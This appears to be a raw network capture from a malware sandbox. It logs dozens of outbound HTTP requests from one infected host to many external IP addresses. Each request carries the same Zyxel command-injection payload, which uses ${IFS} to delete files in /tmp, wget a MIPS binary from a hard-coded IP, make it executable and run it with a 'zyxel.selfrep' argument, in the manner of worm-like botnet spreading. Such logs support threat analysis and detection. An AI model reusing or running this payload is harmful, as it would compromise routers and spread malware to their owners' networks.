                                      Jan 14, 2024 15:50:56.522819996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6787192.168.2.1449232182.199.21.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522861004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6788192.168.2.144962858.146.31.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522897959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6789192.168.2.1439638121.2.228.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522948027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6790192.168.2.144050272.248.6.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.522983074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6791192.168.2.1434132147.248.206.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523013115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6792192.168.2.1435406131.22.87.59443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523052931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6793192.168.2.145728685.68.169.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523108959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6794192.168.2.1446658154.244.242.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523171902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6795192.168.2.143984640.18.172.215443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523205042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6796192.168.2.1439260109.32.151.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523260117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6797192.168.2.144408259.105.102.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523288012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6798192.168.2.143855423.72.18.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523336887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6799192.168.2.1454024190.95.131.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523385048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6800192.168.2.144789237.161.238.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523422003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6801192.168.2.1439464123.232.172.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523468018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6802192.168.2.1457638202.69.10.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523504019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6803192.168.2.143822883.75.185.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523540020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6804192.168.2.1453924129.8.71.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523576975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6805192.168.2.145517895.220.210.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523626089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6806192.168.2.143782217.94.61.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523663998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6807192.168.2.145835672.108.74.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523708105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6808192.168.2.145026663.180.10.184443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523740053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6809192.168.2.144296293.190.73.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523783922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6810192.168.2.143782064.66.254.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523814917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6811192.168.2.1438234161.234.184.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523864031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6812192.168.2.1459094149.217.12.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523911953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6813192.168.2.1453192154.19.87.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523951054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6814192.168.2.1454630160.41.184.93443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.523983955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6815192.168.2.1447972216.174.42.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524012089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6816192.168.2.14469409.13.172.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524066925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6817192.168.2.1447472109.163.200.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524116039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6818192.168.2.144767617.108.33.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524167061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6819192.168.2.143682247.147.150.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524209976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6820192.168.2.146008091.58.62.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524260044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6821192.168.2.1438140179.192.211.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524296045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6822192.168.2.1458590202.92.6.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524343014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6823192.168.2.1437566187.182.165.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524384022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6824192.168.2.1452548169.104.62.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524406910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6825192.168.2.145865818.13.15.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524462938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6826192.168.2.1452654112.99.243.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524516106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6827192.168.2.1457554184.47.177.135443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524538994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6828192.168.2.144852412.146.183.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524585009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6829192.168.2.14487265.170.142.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524641991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6830192.168.2.144176838.130.121.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524667978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6831192.168.2.144659066.222.11.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524698019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6832192.168.2.1452304126.159.131.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524753094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6833192.168.2.145407847.70.42.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524789095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6834192.168.2.145617278.28.60.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524844885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6835192.168.2.144370298.37.199.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524873018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6836192.168.2.1448410212.161.139.165443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524930000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6837192.168.2.1440730126.37.165.83443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.524965048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6838192.168.2.144134695.30.86.82443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525002956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6839192.168.2.145270850.156.92.130443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525057077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6840192.168.2.146011097.96.21.127443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525094032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6841192.168.2.1439738112.38.160.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525113106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6842192.168.2.1451982222.177.32.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525161982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6843192.168.2.1443500220.79.19.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525209904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6844192.168.2.1440938202.31.137.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525239944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6845192.168.2.1447328147.162.138.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525296926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6846192.168.2.1432770181.131.223.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525332928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6847192.168.2.1455312152.216.8.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525368929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6848192.168.2.1460430146.221.11.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:56.525397062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      6849192.168.2.1451730175.76.60.139443
                                      TimestampBytes transferredDirectionData
